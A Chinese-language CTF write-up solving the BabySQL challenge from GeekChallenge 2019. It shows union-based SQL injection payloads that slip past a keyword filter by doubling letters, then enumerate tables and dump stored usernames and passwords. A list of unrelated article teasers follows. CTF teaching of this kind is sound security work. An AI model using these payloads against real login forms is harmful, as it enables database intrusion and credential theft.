[极客大挑战 2019]BabySQL--详细解析

[极客大挑战 2019]BabySQL--详细解析

embedded/2024/11/27 1:05:24/

信息搜集

进入界面：
在这里插入图片描述
输入用户名为admin，密码随便输一个：
发现是GET传参，有username和password两个传参点。
我们测试一下password点位能不能注入：

单引号闭合报错，根据报错信息，我们可以判断是单引号闭合。

SQL注入

先order by测试一下字段数：

sql">check.php?username=admin&password=1' order by 3--+

在这里插入图片描述
报错。看报错信息，吞掉了order的or 和by，即过滤了or和by。
使用双写绕过：

sql">check.php?username=admin&password=1' oorrder bbyy 3--+

测试出字段数为3.

顺便用万能密码试试能不能登录：
在这里插入图片描述
接下来按联合注入的流程走：
union 和 select 被过滤。双写绕过：

sql">check.php?username=admin&password=1' uniunionon selselectect 1,2,3--+

在这里插入图片描述找到相应回显位，这里我们利用回显位3：

sql">check.php?username=admin&password=1' uniunionon selselectect 1,2,database()--+ 数据库名为geekcheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek')--+ 数据表b4bsql,geekusercheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql')--+ 列名id,username,password(selselectect group_concat(username,":",passwoorrd) frfromom b4bsql)--+

在这里插入图片描述
得到flag.

总结

考察的是联合注入，但是增加了过滤。
使用双写绕过。

http://www.ppmy.cn/embedded/140771.html

相关文章

深度学习——3种常见的Transformer位置编码【sin/cos、基于频率的二维位置编码（2D Frequency Embeddings）、RoPE】

深度学习——3种常见的Transformer位置编码【sin/cos、基于频率的二维位置编码（2D Frequency Embeddings）、RoPE】

🌺历史文章列表🌺 深度学习——优化算法、激活函数、归一化、正则化深度学习——权重初始化、评估指标、梯度消失和梯度爆炸深度学习——前向传播与反向传播、神经网络（前馈神经网络与反馈神经网络）、常见算法概要汇总万字长文解读…

阅读更多...

基于 DRNN 神经网络整定的 PID 解耦控制

基于 DRNN 神经网络整定的 PID 解耦控制

1. 基本原理 DRNN（Dynamic Recurrent Neural Network, 动态递归神经网络）是一种带有时间反馈的神经网络，能够建模系统的动态特性，适用于非线性、多变量、时变系统的控制。结合 PID 解耦控制，利用 DRNN 进行动态建模和…

阅读更多...

5.5 W5500 TCP服务端与客户端

5.5 W5500 TCP服务端与客户端

文章目录 1、TCP介绍2、W5500简介2.1 关键函数socketlistensendgetSn_RX_RSRrecv自动心跳包检测getSn_SR 1、TCP介绍 TCP 服务端： 创建套接字[socket]：服务器首先创建一个套接字，这是网络通信的端点。绑定套接字[bind]：服务器将…

阅读更多...

python VS c++

python VS c++

一、语法特点 Python： 语法简洁、优雅，代码可读性极强，采用缩进来表示代码块，摒弃了像 C 那样使用大括号的传统方式，使得代码看上去十分清晰简洁。例如： if 5 > 3:print("5大于3") elif 5 …

阅读更多...

Python人工智能项目报告

Python人工智能项目报告

一、实践概述 1、实践计划和目的在现代社会，计算机技术已成为支撑社会发展的核心力量，渗透到生活的各个领域，应关注人类福祉，确保自己的工作成果能够造福社会，同时维护安全、健康的自然环境，设计出具有包…

阅读更多...

『VUE』34. 异步组件（详细图文注释）

『VUE』34. 异步组件（详细图文注释）

目录加载速度的优化示例代码总结欢迎关注『VUE』专栏，持续更新中欢迎关注『VUE』专栏，持续更新中加载速度的优化实际项目中你可能会有几十个组件,如果一开始就加载了全部组件(哪怕其中有些组件你暂时用不到)这无疑大大增加了响应时间,用户体验…

阅读更多...

网络安全、Web安全、渗透测试之笔经面经总结（一）

网络安全、Web安全、渗透测试之笔经面经总结（一）

本篇文章总结涉及以下几个方面： 对称加密非对称加密？ 什么是同源策略？ cookie存在哪里？可以打开吗 xss如何盗取cookie？ tcp、udp的区别及tcp三次握手，syn攻击？ 证书要考哪些？ …

阅读更多...

@tanstack/vue-query使用手册

@tanstack/vue-query使用手册

1. 搭建 a. 安装 npm i @tanstack/vue-query b. 初始化 import { VueQueryPlugin } from @tanstack/vue-queryapp.use(VueQueryPlugin) 2. 基本使用 a. 使用 useQuery 获取数据 import { useQuery } from @tanstack/vue-query;const { data, error, isLoading, refetch …

阅读更多...

最新文章